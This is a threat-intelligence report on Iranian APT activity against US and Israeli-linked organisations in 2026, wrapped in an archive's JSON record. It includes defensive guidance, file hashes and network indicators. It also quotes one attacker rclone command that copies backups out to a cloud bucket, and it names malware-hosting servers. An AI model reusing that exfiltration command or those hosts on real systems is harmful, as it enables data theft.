{ "id": "d9769176-0c0c-4040-a819-62545cbad3af", "created_at": "2026-04-06T00:14:31.669205Z", "updated_at": "2026-04-10T03:35:19.87186Z", "deleted_at": null, "sha1_hash": "f77e3b05ceeff8819d6be2144932817ad3edc2a7", "title": "Seedworm: Iranian APT on Networks of U.S. Bank, Airport, Software Company", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 113216, "plain_text": "Seedworm: Iranian APT on Networks of U.S. Bank, Airport,\r\nSoftware Company\r\nBy About the Author\r\nArchived: 2026-04-05 21:14:23 UTC\r\nActivity associated with Iranian APT group Seedworm has been spotted on the networks of multiple U.S.\r\ncompanies. The activity began in February 2026 and has continued in recent days. \r\nA U.S. bank, airport, non-profit and the Israeli operations of a U.S. software company were among the\r\ntargets. \r\nWe round up details of recent Iranian cyber threat activity and what defenders need to look out for.\r\nThe Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks\r\nof multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days\r\nfollowing U.S. and Israeli military strikes on Iran that have sparked conflict in the region. \r\nA U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada,\r\nhave experienced suspicious activity on their networks in recent days and weeks. The software company is a\r\nsupplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s\r\nIsrael operation seeming to be the target in this activity.   \r\nA previously unknown backdoor, which we have named Dindoor, was found on the networks of the Israeli outpost\r\nof this software company, with the same backdoor seen on the networks of a U.S. bank and the Canadian non-profit organization. This backdoor leverages Deno, the secure runtime for JavaScript and TypeScript, to execute.\r\nThis backdoor was signed with a certificate issued to “Amy Cherne”.\r\nThere was also an attempt to exfiltrate data from the software company using Rclone to a Wasabi cloud storage\r\nbucket. It’s not clear if this was successful.\r\nrclone copy CSIDL_DRIVE_FIXED\\backups wasabi:[REMOVED]:/192.168.0.x\r\nA different, Python backdoor called Fakeset was found on the networks of the U.S. airport and non-profit. It was\r\nsigned by certificates issued to “Amy Cherne” and “Donald Gay”. The Donald Gay certificate has been used\r\npreviously to sign malware linked to Seedworm. The backdoor was downloaded from two servers belonging to the\r\nBackblaze cloud storage company:\r\ngitempire.s3.us-east-005.backblazeb2.com\r\nelvenforest.s3.us-east-005.backblazeb2.com\r\nThe Donald Gay certificate was also used to sign a sample from the malware family we call Stagecomp and which\r\ndownloads the Darkcomp backdoor. The Stagecomp and the Darkcomp malware have been linked to Seedworm\r\nby vendors including Google, Microsoft and Kaspersky. While this malware wasn’t seen on the targeted networks,\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 1 of 13\n\nthe use of the same certificates suggests the same actor - namely Seedworm - was behind the activity on the\r\nnetworks of the U.S. companies.\r\nWhile it’s not known if the operations of Seedworm are disrupted by the current conflict, already having a\r\npresence on U.S. and Israeli networks prior to the current hostilities beginning means the threat group is in a\r\npotentially dangerous position to launch attacks. While we have disrupted these breaches, other organizations\r\ncould still be vulnerable to attack.  \r\nSeedworm is a long-standing Iranian threat group, which usually mounts classic espionage attacks for the\r\npurposes of spying and information gathering. Active since 2017, CISA has said that Seedworm is “a subordinate\r\nelement within the Iranian Ministry of Intelligence and Security (MOIS).” Seedworm originally focused on\r\nvictims in the Middle East but later broadened its scope to target telecommunications, defense, local government,\r\nand oil and natural gas organizations in Asia, Africa, Europe, and North America. The group develops its own\r\ncustom malware as well as using dual-use and living off the land tools.\r\nContext\r\nOn February 28, 2026, the U.S. and Israel launched a coordinated offensive military air operation targeting Iran,\r\nleading to the death of Iran’s Supreme Leader Ayatollah Ali Khamenei, who was apparently killed on March 1\r\nwhen a U.S./Israeli airstrike hit his compound. Several other high-ranking Iranian officials, as well as multiple\r\ncivilians, were also killed in strikes.\r\nIn retaliation, Iran launched drones and ballistic missiles at adversaries throughout the Gulf region, including\r\ntargeting Israel and U.S. military and diplomatic outposts in multiple countries in the region.\r\nBecause of the heated tension in the region and ongoing attacks, it is likely Iran and its allies may also initiate\r\ncyber operations to further target their adversaries. Both Israel and Iran have a history of carrying out destructive\r\ncyberattacks, including against each other. While internet access in Iran may be disrupted by current military\r\noperations, there are cyber operatives working for the regime based in other countries. \r\nThe UK’s National Cyber Security Centre released an alert following this recent activity, stating that “Iranian state\r\nand Iran-linked cyber actors almost certainly currently maintain at least some capability to conduct cyber activity”\r\nand warning about the potential threat posed by “Iran-linked hacktivists”. Check Point also reported recently that\r\nthe Handala threat group (see below) has been using the Starlink satellite network to stay online even before this\r\nmost recent activity began, with the group reportedly leveraging the technology since mid-January, when a\r\nnationwide Internet shutdown was announced by Iran’s government.  \r\nExamining the cyber activity typically carried out by threat actors associated with Iran and its allies may help us\r\npredict the kinds of cyber operations we may see being executed as this conflict continues. \r\nIranian threat actors have become increasingly proficient in recent years. Not only has their tooling and malware\r\nimproved, but they’ve also demonstrated strong social engineering capabilities, including spear-phishing\r\ncampaigns and “honeytrap” operations used to build relationships with targets of interest to gain access to\r\naccounts or sensitive information.\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 2 of 13\n\nOne of the hallmarks of Iran’s operations in cyberspace is that it periodically mounts destructive attacks against\r\norganizations in countries it deems hostile, which at the moment would obviously include the U.S. and Israel. That\r\ncreates a risk for organizations in those countries because these attacks are about sending a message rather than\r\nstealing information, which means that any organization in the country targeted could be in the firing line. \r\nOther recent activity\r\nDoxing Israeli officials and regional energy sector participants\r\nHandala is an Iranian-aligned hacktivist group that is also known to operate in support of Palestine. They have\r\nbeen active since at least 2024. They are known for conducting attacks targeting Israeli organizations and entities\r\nperceived to support Israel by conducting phishing attacks, data theft, ransomware, extortion and destructive\r\nattacks, including the use of custom wipers. The group operates a leaks site where victim names are posted\r\nalongside stolen data and messages from the group. The group was also reportedly active on multiple underground\r\ncybercrime forums including BreachForums, Ramp and Exploit during its early days, but has since become more\r\nactive on Telegram channels and X (formerly Twitter). \r\nIn December 2025, the group claimed to have compromised the mobile devices of former Israeli Prime Minister\r\nNaftali Bennett and Benjamin Netanyahu's Chief of Staff, Tzachi Braverman. The group leaked material they said\r\nthey had stolen from the phones, including the contact information of prominent Israeli officials, journalists and\r\nbusiness people, photos and videos. However, analysis by researchers disputed some of these claims, saying that\r\nthe attacks appeared to be limited to Telegram accounts, and did not achieve complete phone access.  \r\nIn February 2026, Handala claimed to have breached one of Israel's largest healthcare networks. Meanwhile, in\r\nMarch 2026, the group said it had breached Sharjah National Oil Corporation and Israel Opportunity Energy,\r\nexfiltrating more than 1.3TB of sensitive data, including confidential financial data, oil contracts and project\r\ndetails. The group has also made claims about breaching Saudi Arabian energy company Saudi Aramco in a post\r\non its leaks site. However, the documents shared appeared to consist of older files that were already in circulation\r\npreviously. This raises the possibility that the claim may have been exaggerated or partially fabricated, potentially\r\nrepresenting an influence or psychological operation intended to generate attention, panic or reputation damage.\r\nThe group has also posted messages claiming that Israeli Prime Minister Benjamin Netanyahu will be their next\r\ntarget. \r\nSpearphishing academics and NGOs for intelligence collection\r\nIn an October 2025 campaign, Seedworm carried out a sophisticated spear-phishing attack that used a\r\ncompromised mailbox to distribute a custom backdoor known as Phoenix to international organizations across the\r\nMiddle East and North Africa (MENA), targeting more than 100 government entities as part of an espionage\r\ncampaign.\r\nThe attackers leveraged a malicious Office attachment that has technical overlap with previously reported\r\nSeedworm attacks to deliver Phoenix. The command \u0026 control (C\u0026C) server also reportedly hosted the PDQ\r\nremote access tool, which was used for remote access and persistence, as well as a custom browser credential\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 3 of 13\n\nstealer. It is believed the motive behind these attacks was intelligence collection, as well as persistent access, for\r\nthe purposes of longer-term espionage and exfiltration.\r\nElsewhere, in November 2025, Seedworm was also linked to attacks that targeted academics with expertise on the\r\nMiddle East and other foreign policy experts. This activity took place between June and August 2025. Suspicious\r\nspear-phishing emails impersonated Suzanne Maloney – the vice president and director of the Foreign Policy\r\nprogram at the Brookings Institution and an expert on Iran – using a Gmail address and a misspelled version of\r\nher name - “Suzzane Maloney.”. In the attacks, the actors started out using a benign email, which eventually led to\r\na subsequent email that contained a malicious link to a remote access tool payload. It is likely these attacks were\r\ncarried out as a means to perform espionage - more specifically, as a means to gather intelligence that could be\r\nleveraged for strategic advantage. \r\nThese attacks had TTP overlaps with other Iranian aligned groups (Smoke Sandstorm, Mint Sandstorm/Charming\r\nKitten) but were subsequently attributed to Seedworm.\r\nOther 2025 activity\r\nCamera scanning for intelligence gathering\r\nMarshtreader (Pink Sandstorm, Agrius, Agonizing Serpens) is a group that has been active since 2020 and is\r\nreportedly linked to Iran’s Ministry of Intelligence and Security (MOIS). It is known for its destructive operations\r\nagainst countries in the Middle East, specifically Israel, conducting attacks under multiple aliases and leveraging\r\ndata leaks in order to control and shape narratives using wiper and fake ransomware malware. \r\nIn June 2025, it was reported that the group was observed scanning for vulnerable cameras using CVE-2023-6895\r\nand CVE-2017-7921 across Israel during the June 2025 conflict using infrastructure associated with Iranian\r\nactors. \r\nIn previous conflicts, actors have been observed compromising cameras to gather intelligence to support bombing\r\ndamage assessment (BDA) by providing near-real time visibility of impact from bombings and strikes. It is likely\r\nthese attacks were conducted to gain similar visibility into sensitive locations to perform reconnaissance and\r\npotentially enable follow-on targeting of high value targets. \r\nAdditionally, in June 2025, a successful password-spraying attack conducted from Nord VPN infrastructure\r\nagainst Israeli municipal government entities was reported followed by spear-phishing attacks that contained links\r\nto a ClickFix page designed to trick users into executing malicious PowerShell to ultimately deliver a remote\r\naccess tool (RAT) that can execute arbitrary commands by the attackers. It is likely the motive behind these\r\nattacks was account compromise and espionage. It is not clear what actor was behind these attacks, but the\r\ntargeting of Israeli targets points to an Iranian actor as the most likely perpetrator. \r\nDieNet DDoS attacks \r\nDieNet is a pro-Palestinian hacktivist group that emerged on Telegram around March 2025 and announced its\r\nintention to target “outlaw sites and corrupt government platforms” using DDoS attacks. \r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 4 of 13\n\nFollowing the arrest of activist Mahmoud Khalil, its activities intensified, with the group claiming responsibility\r\nfor multiple DDoS attacks against U.S. critical infrastructure, including energy, financial, healthcare, government,\r\ntransit and communication systems. \r\nIn its attacks, the group leveraged high-volume DDoS attacks reportedly via DDoS-as-a-service infrastructure,\r\nincluding TCP RST, DNS amplification, TCP SYN floods and NTP amplification attacks, as well as website\r\ndefacements and data breaches.  \r\nBased on reporting, its motives were likely political retaliation and service disruption.\r\nWhat can we expect next?\r\nGiven Iran's history of attacks leveraging destructive wipers, distributed-denial-of-service (DDoS) and hack-and-leak attacks, the likely next steps for the nation’s cyber actors and supporters may be multiple campaigns\r\ncombining high-visibility disruption for political signaling and lower-visibility access operations for strategic\r\nleverage.\r\nDefenders should anticipate noisy activity such as DDoS attacks, defacements, and leak claims targeting\r\ngovernment, transportation, energy and defense contractors to amplify psychological and economic pressure. \r\nIt is also likely that more capable state-aligned groups will continue credential harvesting operations, along with\r\nvulnerability exploitation and covert persistence against critical infrastructure to generate immediate impact, while\r\nalso positioning themselves for potential future destructive, espionage or coercive operations.  \r\nDDoS and defacements\r\nGiven the increase in \"hacktivist\" activity, we predict a surge in DDoS and defacements for fast signaling and\r\nmedia impact, similar to what has been observed recently with Handala’s claims of targeting critical national\r\ninfrastructure (CNI). \r\nIt is likely such attacks would target a range of sectors, including government portals, municipal sites,\r\nairports/ports, logistics providers, banks, telcos, media and symbolic brands. \r\nPassword spraying and mailbox compromises\r\nOver the last year, multiple reports involving Iran-backed groups repeatedly highlighted credential attacks and\r\nmailbox compromises as a means of initial access and intelligence gathering. \r\nTargets could include defense organizations, government, contractors and NGOs. Additionally, adjacent\r\norganizations that support base operations, including fuel, catering, logistics, and communications could also be\r\ntargets of these attacks.\r\nLeaks / intimidation operations / psyops\r\nHacktivists such as Handala repeatedly use leaks and claims to amplify fear and pressure even when access is only\r\npartial - this is key escalation behavior.\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 5 of 13\n\nPotential targets of these kinds of attacks and claims would likely include healthcare, local government,\r\nairports/ports, transportation and education, as well as high-profile individuals tied to defense, politics and media. \r\nCritical infrastructure and opportunistic attacks\r\nGiven the current escalations between the U.S. and Iran, it is likely that CNI is at high risk of attack, as well as\r\norganizations supporting these entities. \r\nOrganizations with exposed terminal operating systems, schedules and trucking/rail interfaces may be targeted, as\r\nwell as passenger processing systems, baggage systems, and contractor networks. Additionally, given the high\r\nrisk, other organizations that operate within sectors such as energy/fuel supply chains may be targets. \r\nDestructive attacks\r\nIran has previously exhibited high capabilities in destructive potential, particularly during escalation windows. \r\nAny attacks would likely to be focused on energy and utilities, transportation and logistics, financial sector,\r\ntelecoms, healthcare, defense contractors and military suppliers. \r\nHow can defenders prepare?\r\nOrganizations should prepare by focusing on strengthening monitoring capabilities and ensure resilience across\r\ntheir infrastructure where possible. Early indicators such as vulnerability scanning, credential attacks and\r\nreconnaissance activity often provide an opportunity for defenders to detect intrusion attempts early in the attack\r\nchain.\r\nDDoS and defacement campaigns\r\nDue to the likelihood of early retaliation and intensifying psyops, defenders should expect attempts to disrupt\r\npublic-facing services and monitor any internet-facing infrastructure for the following:\r\nSpikes in HTTP requests from large, distributed IP ranges\r\nRepeated probing of admin portals \r\nExploit attempts targeting web frameworks and content management systems\r\nScanning activity against exposed API endpoints\r\nTo prepare, organizations should look at performing the following:\r\nDeploy web application firewalls (WAF) with updated rule sets\r\nEnable DDoS protection via CDN or upstream filtering services\r\nDecommission any non-essential or unused publicly accessible services \r\nEnsure all up-to-date patches for web applications/plugins are applied regularly \r\nEnsure website backups exist for rapid restoration, if required\r\nMonitor underground forums, Telegram channels and social media for claims involving your organization\r\nCredential attacks\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 6 of 13\n\nCredential attacks are one of the most common initial access techniques used by Iranian-linked groups, which\r\ninclude attack attempts against multiple public-facing services.\r\nDefenders should ensure monitoring is in place to identify patterns consistent with password-spraying attempts,\r\nsuch as the following:\r\nRepeated login failure attempts across multiple users\r\nAuthentication attempts from unusual geographic locations\r\nMFA fatigue attacks\r\nLogin attempts occurring outside of normal working hours \r\nVulnerability scanning and exploitation of vulnerable VPN appliances or edge infrastructure\r\nDeployment of web shells on internet-facing servers\r\nCredential harvesting through phishing campaigns\r\nOrganizations should review and harden any identity security mechanisms by performing the following:\r\nEnable multi-factor authentication for all remote access\r\nDisable legacy authentication protocols\r\nImplement condition access policies based on location and device risk\r\nRestrict admin logins to specific locations, where possible\r\nMonitor identity provider logs for any anomalies\r\nLeak campaigns and intimidation operations\r\nHacktivist groups often use hack-and-leak campaigns designed to gain media attention and apply psychological\r\npressure, usually via partial data leaks and exaggerated breach claims. Security teams should watch for indicators\r\nof data staging or exfiltration, such as the following:\r\nUnusual downloads from email systems\r\nUnusual access to document repositories\r\nSuspicious archive creation (e.g. ZIP, RAR) on internal systems, usually involving collection of multiple\r\nfile types \r\nLarge outbound data transfers to external cloud storage platforms \r\nUnexpected use of data-transfer applications (e.g. Rclone) in their environment\r\nOrganizations should focus on ensuring monitoring is in place for the following:\r\nLarge outbound data transfers\r\nImplement data loss prevention (DLP) policies\r\nRestrict access to external cloud storage platforms\r\nEnable auditing of email and file access\r\nHaving a communications plan for potential leak claims can also help organizations respond quickly to these\r\nthreats. \r\nAttacks on critical infrastructure\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 7 of 13\n\nCritical infrastructure organizations and companies that support military logistics may face attacks that attempt to\r\ncompromise the following:\r\nOperational Technology (OT) interfaces \r\nScheduled and logistics systems\r\nContractor networks\r\nRemote management systems\r\nSecurity teams should ensure adequate monitoring is in place for:\r\nAbnormal access to ICS\r\nUnexpected remote connections to operational networks\r\nAuthentication attempts targeting infrastructure management systems\r\nUnusual configuration changes in critical systems\r\nVendor access and contractor networks\r\nOrganizations faced with these attacks, at a minimum, should ensure:\r\nNetwork segmentation across operational technology networks\r\nRestrict remote access to infrastructure systems\r\nMonitor contractor VPN access\r\nMaintain offline backups of critical configuration systems\r\nDestructive attacks\r\nIran has repeatedly demonstrated its destructive capabilities in the past, with attacks such as Shamoon, which\r\ntargeted Saudi Arabia's oil industry to wipe thousands of systems. \r\nOrganizations that anticipate such attacks should ensure they monitor for indicators that attackers may be\r\npreparing for a destructive operation such as:\r\nMass scheduled task creation \r\nAttempts to disable security applications \r\nDeletion of shadow copies or backup data\r\nUnusual administrative commands executed across multiple hosts\r\nOrganizations should prioritize resilience against destructive attacks by conducting the following tasks:\r\nIsolating backup infrastructure from production networks\r\nEnable immutable backups\r\nTest disaster recovery procedures regularly\r\nEnsuring systems can be restored quickly is critical to recovering from the impact of destructive attacks. \r\nHistorical activity\r\nStuxnet\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 8 of 13\n\nOne of the most infamous cyber incidents to ever take place in the Middle East region was the deployment of the\r\nStuxnet worm, which was designed to break laboratory equipment used by Iranian scientists to enrich uranium at\r\nthe Natanz facility in Iran. Iran has claimed that this facility has been hit in strikes by Israel and the U.S. in recent\r\ndays. The disruption of Iran’s nuclear program to prevent the country from developing nuclear weapons was one\r\nof the reasons given by the U.S. administration for carrying out these recent strikes. The facility was also hit in\r\nU.S. strikes in June 2025, which were believed at the time to have rendered the facility inoperable. \r\nStuxnet was among the first known major nation-state cyberattacks that demonstrated hackers’ ability to\r\nmanipulate and even destroy physical equipment. Stuxnet was designed to cause the spinning motors at the bottom\r\nof Natanz's enrichment centrifuges to shatter. It was first published about by researchers at Symantec in 2010,\r\nafter the worm spread outside of the Natanz facility and was found on private networks. Given that Stuxnet was\r\nonly discovered after penetrating private networks, it is quite possible that cyber operations are currently being\r\nleveraged by and against infrastructure that we know nothing about - yet.\r\nReports last year indicated potential cyber warfare impacting the region then too, including an attack by pro-Israel\r\nhackers dubbed Predatory Sparrow on Iranian crypto exchange Nobitex in which the attackers drained $90 million\r\nof cryptocurrency from the exchange. There were also reports that Iranian group Damselfly was carrying out a\r\ntargeted phishing campaign focused on high-profile Israeli individuals, particularly prominent academics,\r\njournalists, and security researchers (See more in Damselfly profile).\r\nDamselfly is just one of the key cyber actors who may be active in the current conflict, potentially targeting the\r\nnetworks of significant institutions in other nations for espionage, disruptive or destructive purposes. \r\nOther key actors\r\nDruidfly\r\nDruidfly (aka Homeland Justice, Karma) is an Iranian attack group that specializes in disk-wiping attacks. It first\r\ncame to public attention after a July 2022 wiper attack on multiple targets belonging to the government of\r\nAlbania. The wiper left messages directed against the Mujahideen E-Khalq (MEK), an Iranian dissident\r\norganization based in Albania. Shortly afterward, a group calling itself Homeland Justice claimed credit for the\r\nattack.\r\n In response to the attack, Albania broke off diplomatic relations with Iran. This triggered another wave of attacks\r\nin September 2022, apparently in retaliation for Albania publicly attributing the attacks to Iran. While Homeland\r\nJustice purported to be a hacktivist outfit, the FBI later established that “Iranian state cyber actors” were\r\nresponsible for the attacks. \r\nDruidfly reappeared in 2023, when it began targeting Israel with a wiper called BibiWiper, seemingly named after\r\nIsraeli Prime Minister Benjamin Netanyahu, whose nickname is “Bibi” (See Case Study).\r\nOn June 20, 2025, when hostilities between Iran and Israel were previously at a high, we tweeted that we had seen\r\na Druidfly wiper targeting organizations in Albania. The wiper was signed with a legitimate certificate, which was\r\nprobably stolen. On the Monday following (June 23), it was reported in the media that public services in Albania’s\r\ncapital Tirana had been disrupted by a cyber attack that took down the city’s official website and affected local\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 9 of 13\n\ngovernment operations. Homeland Justice claimed credit for the attack and said it had taken down the city’s\r\nofficial website, exfiltrated data and wiped servers, citing the presence of MEK in the country as the reason for the\r\nattack.\r\nCase study: Druidfly attacks on Israeli targets\r\nFollowing the escalation of the conflict in Gaza in 2023, Druidfly was linked to a series of wiper attacks against\r\nmultiple targets in Israel. In this case, the attacks were carried out under a persona called Karma that purports to\r\nbe a hacktivist group sympathetic to the Palestinian cause. \r\nThe wiper deployed in these attacks was called BibiWiper, seemingly named after Israeli Prime Minister\r\nBenjamin Netanyahu, whose nickname is Bibi. The wiper encrypted files on the hard disk before overwriting the\r\nmaster boot record (MBR) and crashing the computer. Efforts to restart the computer would fail because of the\r\ndestruction of the MBR. Analysis of the wiper revealed clear anti-Israel messages within the wiper’s code.\r\nFurthermore, analysis of BibiWiper by the Threat Hunter Team found clear similarities between it and wipers\r\ndeployed by Druidfly during attacks against Albania in 2022 and 2023.\r\nTracing other tools used to initiate the BibiWiper attacks against Israel revealed the following overlap in tactics,\r\ntechniques, and procedures between these attacks and earlier Druidfly attacks:\r\nHTTPSnoop malware was previously deployed prior to the Druidfly wiping attacks\r\nUse of the remote desktop tools AnyDesk and ScreenConnect\r\nUse of ReGeorg web shells\r\nDamselfly\r\nDamselfly (aka Charming Kitten, Mint Sandstorm) is an Iranian espionage group that has been active since 2014.\r\nIt was initially known for targeting Israel with attacks before it broadened its focus to include the U.S. and other\r\ncountries. While the group is principally known to be involved in intelligence gathering, members of the group are\r\nalso known to have participated in extortion attacks. It has been linked by multiple vendors with Iran’s Islamic\r\nRevolutionary Guard Corps (IRGC).\r\nIn March 2022, Damselfly was one of several Iranian groups reported to have moved into mounting large-scale\r\nsocial engineering campaigns. Consistent features of these campaigns included the use of charismatic sock\r\npuppets, lures of prospective job opportunities, solicitation by journalists, and masquerading as think tank experts\r\nseeking opinions. The attackers leveraged networks such as LinkedIn, Facebook, Twitter, and Google.\r\nDamselfly has also been linked to an attack targeting a nuclear security expert at a U.S.-based think tank in July\r\n2023; attacks on Israel’s transportation, logistics, and technology sectors in November 2023; as well as a January\r\n2024 campaign targeting individuals working on Middle Eastern affairs at universities and research organizations\r\nin Belgium, France, Gaza, Israel, the UK, and the U.S. The attackers in that campaign used bespoke phishing lures\r\nthemed around the Israel-Hamas conflict to trick targets into downloading malware.\r\nIn 2025, Check Point reported that a new Damselfly campaign that began in mid-June 2025 targeted Israeli\r\njournalists, cyber security experts and computer science professors from leading Israeli universities with spear\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 10 of 13\n\nphishing campaigns in an attempt to steal credentials and multi-factor authentication codes in order to gain access\r\nto targets’ email accounts. Some of the victims were approached by attackers who posed as fictitious assistants to\r\ntechnology executives or researchers through emails and WhatsApp messages.\r\nMantis\r\nActive since at least 2014, Mantis (aka Desert Falcon, Arid Viper, APT-C-23), is an Arabic speaking group that\r\nappears to be based in the Gaza Strip. The group is known to mount espionage attacks against targets in the\r\ngovernment, military, media, financial, research, education, and energy sectors. Most of its attacks have been\r\nagainst organizations in the Middle East but it has, on occasion, attacked targets outside the region. It has also\r\nbeen known on occasion to target individuals or organizations internally within Gaza. While other vendors have\r\nlinked the group to Hamas, the Threat Hunter Team cannot make a definitive attribution to any Palestinian\r\norganization. \r\nThe group mainly favors spear-phishing emails with malicious attachments or links to malicious files as its main\r\ninfection vector. Mantis uses custom malware and its most recent toolset includes the backdoors Trojan.Micropsia\r\nand Trojan.AridGopher. Micropsia is capable of taking screenshots, keylogging, and archiving certain file types\r\nusing WinRAR in preparation for data exfiltration. However, its main purpose appears to be running secondary\r\npayloads for the attackers. Arid Gopher is a modular backdoor that is written in Go. It appears to be regularly\r\nupdated and rewritten by the attackers, most likely to evade detection.\r\nThese tools were used in a Mantis attack in late 2022/early 2023 that targeted organizations within the Palestinian\r\nterritories. The initial infection vector for this campaign remains unknown, but both the Micropsia and\r\nAridGopher malware were deployed in this attack. In one intrusion, the attackers deployed three distinct versions\r\nof the same toolset (that is, different variants of the same tools) on three groups of computers.\r\nCompartmentalizing the attack in this fashion was likely a precautionary measure. If one toolset was discovered,\r\nthe attackers would still have a persistent presence on the target’s network. \r\nIndicators of Compromise (IOCs)\r\n0f9cf1cf8d641562053ce533aaa413754db88e60404cab6bbaa11f2b2491d542 - Trojan.Dindoor\r\n1d984d4b2b508b56a77c9a567fb7a50c858e672d56e8cf7677a1fca5c98c95d1 - Trojan.Dindoor\r\n2a00705cfd3c15cf8913e9eb4e23968efd06f1feceaef9987d26c5518887d043 - Trojan.Dindoor\r\n2a09bbb3d1ddb729ea7591f197b5955453aa3769c6fb98a5ef60c6e4b7df23a5 - Trojan.Dindoor\r\n42a5db2a020155b2adb77c00cbe6c6ad27c2285d8c6114679d9d34137e870b3f - Trojan.Dindoor\r\n7467f326677a4a2c8576e71a832e297e794ea00e9b67c4fcbe78b5aec697cec4 - Trojan.Dindoor\r\n7c30c16e7a311dc0cdb1cdfd9ea6e502f44c027328dbe7d960b9bcd85ccf5eef - Trojan.Dindoor\r\nb0af82de672d81f3c2f153977923b3884a8a9e7045b182c2379b19a1996931a0 - Trojan.Dindoor\r\nbd8203ab88983bc081545ff325f39e9c5cd5eb6a99d04ae2a6cf862535c9829a - Trojan.Dindoor\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 11 of 13\n\nc7cf1575336e78946f4fe4b0e7416b6ebe6813a1a040c54fb6ad82e72673478e - Trojan.Dindoor\r\n077ab28d66abdafad9f5411e18d26e87fe43da1410ee8fe846bd721ab0cb52de - Trojan.Fakeset\r\n15061036c702ad92b56b35e42cf5dc334597e7311e98d2fdd3815a69ac3b1d84 - Trojan.Fakeset\r\n2b7d8a519f44d3105e9fde2770c75efb933994c658855dca7d48c8b4897f81e6 - Trojan.Fakeset\r\n4aef998e3b3f6ca21c78ed71732c9d2bdcc8a4e0284f51d7462c79d446fbc7be - Trojan.Fakeset\r\n64263640a6fdeb2388bca2e9094a17065308cf8dcb0032454c0a71d9b78327eb - Trojan.Fakeset\r\n64cf334716f15da1db7981fad6c81a640d94aa1d65391ef879f4b7b6edf6e7f1 - Trojan.Fakeset\r\n74db1f653da6de134bdc526412a517a30b6856de9c3e5d0c742cb5fe9959ad0d - Trojan.Fakeset\r\n94f05495eb1b2ebe592481e01d3900615040aa02bd1807b705a50e45d7c53444 - Trojan.Fakeset\r\na4bd1371fe644d7e6898045cc8e7b5e1562bdfd0e4871d46034e29a22dec6377 - Trojan.Fakeset\r\na5d4d6be3bfe0cba23fe6b44984b5fc9c7c7e10030be96120bb30da0f2545d4c - Trojan.Fakeset\r\nddceade244c636435f2444cd4c4d3dc161981f3af1f622c03442747ecef50888 - Trojan.Fakeset\r\n24857fe82f454719cd18bcbe19b0cfa5387bee1022008b7f5f3a8be9f05e4d14 - Trojan.Stagecomp\r\nA92d28f1d32e3a9ab7c3691f8bfca8f7586bb0666adbba47eab3e1a8faf7ecc0 - - Trojan.Stagecomp\r\n3df9dcc45d2a3b1f639e40d47eceeafb229f6d9e7f0adcd8f1731af1563ffb90 - Trojan.Darkcomp\r\n1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6 - Trojan.Darkcomp\r\nNetwork Indicators\r\ngitempire.s3.us-east-005.backblazeb2[.]com\r\nelvenforest.s3.us-east-005.backblazeb2[.]com\r\nuppdatefile[.]com\r\nserialmenot[.]com\r\nmoonzonet[.]com\r\nFurther Reading\r\nWe published a whitepaper in 2024 discussing the cyber activity we typically see emanating from this region titled\r\nConflict in the Middle East: An Overview of Cyber Threat Actors and Risks.  \r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 12 of 13\n\nSource: https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nhttps://www.security.com/threat-intelligence/iran-cyber-threat-activity-us\r\nPage 13 of 13", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us" ], "report_names": [ "iran-cyber-threat-activity-us" ], "threat_actors": [ { "id": "82b92285-4588-48c9-8578-bb39f903cf62", "created_at": "2022-10-25T15:50:23.850506Z", "updated_at": "2026-04-10T02:00:05.418577Z", "deleted_at": null, "main_name": "Charming Kitten", "aliases": [ "Charming Kitten" ], "source_name": "MITRE:Charming Kitten", "tools": [ "DownPaper" ], "source_id": "MITRE", "reports": null }, { "id": "d8af157e-741b-4933-bb4a-b78490951d97", "created_at": "2023-01-06T13:46:38.748929Z", "updated_at": "2026-04-10T02:00:03.087356Z", "deleted_at": null, "main_name": "APT35", "aliases": [ "COBALT MIRAGE", "Agent Serpens", "Newscaster Team", "Magic Hound", "G0059", "Phosphorus", "Mint Sandstorm", "TunnelVision" ], "source_name": "MISPGALAXY:APT35", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b", "created_at": "2022-10-25T15:50:23.308924Z", "updated_at": "2026-04-10T02:00:05.298591Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": [ "MuddyWater", "Earth Vetala", "Static Kitten", "Seedworm", "TEMP.Zagros", "Mango Sandstorm", "TA450" ], "source_name": "MITRE:MuddyWater", "tools": [ "STARWHALE", "POWERSTATS", "Out1", "PowerSploit", "Small Sieve", "Mori", "Mimikatz", "LaZagne", "PowGoop", "CrackMapExec", "ConnectWise", "SHARPSTATS", "RemoteUtilities", "Koadic" ], "source_id": "MITRE", "reports": null }, { "id": "ad78338e-8bb6-4745-acae-27d3cc3cf76d", "created_at": "2023-11-17T02:00:07.580677Z", "updated_at": "2026-04-10T02:00:03.452097Z", "deleted_at": null, "main_name": "Bohrium", "aliases": [ "BOHRIUM", "IMPERIAL KITTEN", "Smoke Sandstorm" ], "source_name": "MISPGALAXY:Bohrium", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2ed8d590-defa-4873-b2de-b75c9b30931e", "created_at": "2023-01-06T13:46:38.730137Z", "updated_at": "2026-04-10T02:00:03.08136Z", "deleted_at": null, "main_name": "MuddyWater", "aliases": 